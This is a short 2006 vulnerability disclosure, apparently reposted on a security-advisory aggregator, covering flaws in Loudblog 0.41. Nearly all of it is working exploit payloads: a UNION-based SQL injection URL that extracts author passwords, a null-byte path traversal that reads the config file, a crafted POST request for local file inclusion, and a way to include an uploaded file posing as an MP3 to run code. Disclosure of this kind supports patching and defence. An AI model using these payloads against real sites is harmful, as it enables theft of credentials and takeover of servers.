Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11732
HistoryMar 08, 2006 - 12:00 a.m.

Loudblog 0.41 SQL Injection, Local file read/include

2006-03-0800:00:00
vulners.com
9

"Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media
content on the web."

SQL Injection in podcast.php (magic_quotes=off):
http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select
password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
from lb_authors where '1'='1' /*

Read local files (index.php):
http://[target]/loudblog/index.php?template=…/…/…/loudblog/custom/config.php%00

Local php file include (loudblog/inc/backend_settings.php):
POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

language=…/…/…/index

Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin
panel):
http://[target]/loudblog/loudblog/index.php?page=/…/…/…/audio/cmdphp.mp3%00

~kuze